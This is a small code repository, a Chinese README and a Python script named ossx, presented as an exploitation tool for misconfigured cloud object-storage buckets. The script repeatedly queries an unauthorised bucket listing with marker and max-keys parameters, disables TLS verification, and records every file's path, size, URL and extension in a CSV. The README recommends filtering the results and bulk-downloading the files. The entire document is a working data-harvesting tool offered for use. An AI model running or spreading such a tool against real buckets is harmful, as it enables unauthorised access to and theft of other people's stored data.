├── README.md └── ossx.py /README.md: -------------------------------------------------------------------------------- 1 | # ossx 2 | 存储桶遍历漏洞利用脚本 3 | 4 | 可以批量提取未授权的存储桶OSS的文件路径、大小、后缀名称 5 | 6 | 通过判断nextmarker参数达到对未授权存储桶进行翻页的效果、其次控制maxkey参数可以控制每页返回结果的数量 7 | 8 | 提取的结果会自动生成到csv文件中,后续可以根据文件后缀名称、文件大小进行自行筛选 9 | 10 | 或将文件url批量导入讯雷等进行批量下载...... 11 | 12 | ![image](https://github.com/source-xu/oss-x/assets/56073532/592ff801-d27a-4fba-b664-91537c8312c4) 13 | 14 | ![image](https://github.com/source-xu/ossx/assets/56073532/a3f318fe-456d-42a8-af56-66e7df7bc9a6) 15 | 16 | 17 | ![image](https://github.com/source-xu/oss-x/assets/56073532/54dffeb3-5590-44da-9834-de261d912bb3) 18 | -------------------------------------------------------------------------------- /ossx.py: -------------------------------------------------------------------------------- 1 | import csv 2 | import time 3 | import warnings 4 | import xml.etree.ElementTree as ET 5 | 6 | import requests 7 | import urllib3 8 | 9 | # 忽略InsecureRequestWarning警告 10 | warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning) 11 | 12 | # 用来统计所有key的列表 13 | totoal_keys = [] 14 | 15 | 16 | # 获取存储桶页面默认显示条数max-keys,默认最大不超过1000 17 | def get_info(url): 18 | response = requests.get(url, verify=False) 19 | # 解析XML内容 20 | xml_content = response.content 21 | # 解析XML 22 | root = ET.fromstring(xml_content) 23 | maxkey = root.findtext(f".//MaxKeys") 24 | nextmarker = root.find(f".//NextMarker") 25 | xpath_expr = ".//Contents" 26 | # 检查是否存在命名空间,存在命名空间的索引写法需要改变 27 | has_namespace = root.tag.startswith("{") 28 | if has_namespace: 29 | # 获取命名空间 30 | namespace = root.tag.split('}')[0].strip('{') 31 | xpath_expr = f".//{{{namespace}}}Contents" 32 | maxkey = root.findtext(f".//{{{namespace}}}MaxKeys") 33 | nextmarker = root.find(f".//{{{namespace}}}NextMarker") 34 | # 获取所有子标签的名称 35 | child_tags = set() 36 | for contents_element in root.findall(xpath_expr): 37 | for child_element in contents_element: 38 | if has_namespace: 39 | child_tags.add(child_element.tag.replace(f"{{{namespace}}}", "")) 40 | else: 41 | child_tags.add(child_element.tag) 42 | # 创建csv文件写入表头也就是各列名称 43 | filename = write_csv_header(child_tags) 44 | # 返回PageSize、下一页索引、创建的CSV文件名称、以及列名集合 45 | return maxkey, nextmarker, filename, child_tags 46 | 47 | 48 | def getdata(baseurl, max_keys, csv_filename, child_tags, marker='', page=0): 49 | if int(max_keys) < 1000: 50 | max_keys = 1000 51 | baseurl = baseurl 52 | url = baseurl + f'?max-keys={max_keys}&marker={marker}' 53 | response = requests.get(url, verify=False) 54 | xml_content = response.content 55 | root = ET.fromstring(xml_content) 56 | # 检查是否存在命名空间 57 | namespace = '' 58 | xpath_expr = ".//Contents" 59 | nextmarker = root.findtext(f".//NextMarker") 60 | has_namespace = root.tag.startswith("{") 61 | if has_namespace: 62 | # 获取命名空间 63 | namespace = root.tag.split('}')[0].strip('{') 64 | xpath_expr = f".//{{{namespace}}}Contents" 65 | nextmarker = root.findtext(f".//{{{namespace}}}NextMarker") 66 | datas = root.findall(xpath_expr) 67 | # 写入数据 68 | nums, is_repeate, repeate_nums, total_nums = write_csv_content(csv_filename, datas, has_namespace, namespace, 69 | child_tags) 70 | page += 1 71 | print(f"[+] 第{page}页检测到{nums}条数据,共计发现{total_nums}个文件") 72 | # 是否存在nextmarker存在则说明还有下一页需要迭代进行遍历,不存在则说明以及遍历完成退出 73 | if nextmarker is None or is_repeate == 1: 74 | print(f"[√] 数据结果已写入文件:{csv_filename},请查看😀") 75 | return 76 | getdata(baseurl, max_keys, csv_filename, child_tags, nextmarker, page) 77 | 78 | 79 | def write_csv_header(child_tags): 80 | # 获取当前时间戳 81 | timestamp = int(time.time()) 82 | # 将时间戳转换为字符串 83 | timestamp_str = str(timestamp) 84 | # 创建CSV文件并写入数据 85 | csv_filename = f'xml_data{timestamp_str}.csv' 86 | with open(csv_filename, 'w', newline='') as csv_file: 87 | # 写入表头,另外增加完整的url和文件类型列 88 | writer = csv.writer(csv_file) 89 | list_tags = list(child_tags) 90 | list_tags.append("url") 91 | list_tags.append("filetype") 92 | writer.writerow(list_tags) 93 | return csv_filename 94 | 95 | 96 | def write_csv_content(csv_filename, datas, has_namespace, namespace, child_tags): 97 | # 提取数据并写入CSV文件 98 | with open(csv_filename, 'a', newline='') as csv_file: 99 | nums = 0 100 | repeate_nums = 0 101 | is_repeate = 0 102 | # 写入数据 103 | for contents_element in datas: 104 | if has_namespace: 105 | row = [contents_element.findtext(f"{{{namespace}}}{tag}") for tag in child_tags] 106 | key = contents_element.findtext(f"{{{namespace}}}Key") 107 | else: 108 | row = [contents_element.findtext(tag) for tag in child_tags] 109 | key = contents_element.findtext(f"Key") 110 | if str(key) not in totoal_keys: 111 | nums += 1 112 | totoal_keys.append(key) 113 | url = str(baseUrl) + str(key) 114 | parts = str(key).split(".") 115 | if len(parts) > 1: 116 | # 如果分割后的列表长度大于1,说明存在文件后缀名 117 | file_extension = parts[-1] 118 | else: 119 | # 否则,文件后缀名不存在 120 | file_extension = "" 121 | row.append(url) 122 | row.append(file_extension) 123 | writer = csv.writer(csv_file) 124 | writer.writerow(row) 125 | else: 126 | repeate_nums += 1 127 | if repeate_nums > 2: 128 | is_repeate = 1 129 | 130 | return nums, is_repeate, repeate_nums, len(totoal_keys) 131 | 132 | 133 | if __name__ == '__main__': 134 | # 发送HTTP请求获取响应 135 | url = input("[*] 请输入存储桶遍历url:").strip() 136 | baseUrl = input("[*] 请输入存储桶根路径(不输入则和上述url保持一致):").strip() 137 | if baseUrl == '': 138 | baseUrl = url 139 | if not baseUrl.endswith('/'): 140 | baseUrl += '/' 141 | # 获取存储桶基本信息包括默认的PageSize、下一页索引,同时创建csv文件根据字段写表头 142 | try: 143 | maxkey, nextmarker, csv_filename, child_tags = get_info(url) 144 | if len(child_tags) != 0: 145 | print("[+] xml数据提取成功!✨") 146 | # 未指定maxkey则默认1000 147 | if maxkey == None: 148 | maxkey = 1000 149 | print(f"[o] 该存储桶默认每页显示{maxkey}条数据") 150 | if nextmarker == None: 151 | print("[-] 该存储桶不支持Web翻页遍历😢") 152 | else: 153 | print("[+] 该存储桶支持遍历,正在获取文件及数量😀") 154 | getdata(url, max_keys=maxkey, child_tags=child_tags, csv_filename=csv_filename) 155 | else: 156 | print("[-] 该存储桶不支持遍历,或检查网址是否有误!") 157 | except Exception as e: 158 | print(e) 159 | print("[-] XML解析有误,无法遍历😢") 160 | --------------------------------------------------------------------------------